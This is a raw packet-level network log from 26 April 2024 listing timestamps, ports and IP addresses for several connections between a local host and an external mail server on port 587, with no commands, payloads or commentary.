Apr 26, 2024 11:45:30.049525023 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.049556017 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.049586058 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.051068068 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.051139116 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.051280022 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.051409960 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.051443100 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.051820040 CEST	587	49766	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.257314920 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.263870001 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:30.263881922 CEST	49766	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:30.472381115 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.473211050 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:30.680583000 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.680855989 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:30.928952932 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.929012060 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:30.929264069 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.136646032 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.136696100 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.137113094 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.137236118 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.137274981 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.137404919 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.139790058 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.344484091 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.344602108 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.344628096 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.344636917 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.344669104 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.344719887 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.347304106 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.347384930 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.347454071 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.347523928 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.347716093 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.347778082 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.347871065 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.347929955 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.389040947 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.389116049 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.552038908 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.552162886 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.554735899 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.554802895 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.554936886 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.555022955 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.555058956 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.555135012 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.555138111 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.555196047 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.555252075 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.555284977 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.555309057 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.555352926 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.555547953 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.555612087 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.596704006 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.596802950 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.759691954 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.759788036 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.759995937 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.762063980 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.762129068 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.762146950 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.762290001 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.762495041 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.762571096 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.762809992 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.762865067 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763016939 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763134956 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763170958 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763314009 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763345957 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763437033 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763520956 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763552904 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763659000 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763709068 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763744116 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763776064 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763946056 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.763978958 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.764012098 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.804234982 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.804274082 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.804306984 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.804338932 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.839807034 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.967901945 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.967956066 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.968007088 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.968096972 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.968147039 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.968178988 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.968211889 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.968242884 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.969415903 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.969468117 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.969499111 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.969528913 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.969954014 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.970087051 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:31.970630884 CEST	587	49767	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:31.973093033 CEST	49767	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.047245979 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.047708988 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.076652050 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.284431934 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.284537077 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.325469971 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.329174042 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.536891937 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.537190914 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.543776035 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.543955088 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.747734070 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.749365091 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.751692057 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.751847982 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.960619926 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.961066961 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.964062929 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.964188099 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.964226007 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:32.964262009 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:32.965814114 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.173338890 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.176001072 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.176043034 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.176091909 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.176155090 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.177073956 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.177891970 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.384514093 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.384675026 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.385767937 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.387784004 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.592396021 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.592621088 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.595474005 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.595642090 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.800930977 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.801079988 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:33.803972006 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:33.804136992 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.008565903 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.008814096 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.012772083 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.013273954 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.221036911 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.221690893 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.246427059 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.248363972 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.455822945 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.459333897 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.459333897 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.460130930 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.460130930 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.462699890 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.469022036 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.469285011 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.666961908 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.667022943 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.667218924 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.667248011 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.667284012 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.667516947 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.670182943 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.670217037 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.670248032 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.670403957 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.670432091 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.670558929 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.677180052 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.677666903 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.677666903 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.677758932 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.677758932 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.679280043 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.710793972 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.713072062 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.874888897 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.874991894 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.877641916 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.877707958 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.877945900 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.877983093 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.878015995 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.878026962 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.878052950 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.878084898 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.885225058 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.885261059 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.885293007 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.885308981 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.885324955 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.885384083 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.886878014 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.886910915 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.886971951 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.886984110 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.886984110 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.887044907 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.887094975 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.887161970 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.918811083 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.918873072 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:34.921190023 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:34.921264887 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.082412004 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.082439899 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.082479954 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.082528114 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.084964037 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.085026979 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.085031033 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.085088015 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.085223913 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.085397959 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.085413933 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.085550070 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.085649967 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.085951090 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086026907 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086190939 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086245060 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086261034 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086317062 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086447954 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086546898 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086565971 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086662054 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086750031 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086786032 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086836100 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086850882 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.086886883 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.093053102 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.093136072 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.094722033 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.094856977 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.094877005 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.094959974 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.094978094 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.095040083 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.095067978 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.095125914 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.095196962 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.095264912 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.095282078 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.095349073 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.095587015 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.095655918 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.126167059 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.126185894 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.128498077 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.128516912 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.128530979 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.128582954 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.289933920 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.289987087 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.290021896 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.290052891 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.290082932 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.290115118 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.290144920 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.290177107 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.292251110 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.292310953 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.292361975 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.292393923 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.292464972 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.292567968 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.293566942 CEST	587	49768	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.301436901 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.301496029 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.301547050 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.301603079 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.302448988 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.302510977 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.302566051 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.302618980 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.302681923 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.302745104 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.302845955 CEST	49769	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.302912951 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.302990913 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303081989 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303113937 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303181887 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303282976 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303352118 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303471088 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303504944 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303536892 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303566933 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303659916 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303693056 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303724051 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303819895 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303853035 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303884983 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303916931 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.303961992 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.304037094 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.304069042 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.304116011 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.304224014 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.304260969 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.350157976 CEST	49768	587	192.168.2.4	207.174.215.249
Apr 26, 2024 11:45:35.509238958 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.509293079 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.509351969 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.509385109 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.509416103 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.509448051 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.509479046 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.509510040 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510055065 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510317087 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510350943 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510384083 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510413885 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510446072 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510478020 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510559082 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510612965 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.510885954 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.511233091 CEST	587	49769	207.174.215.249	192.168.2.4
Apr 26, 2024 11:45:35.591975927 CEST	49769	587	192.168.2.4	207.174.215.249
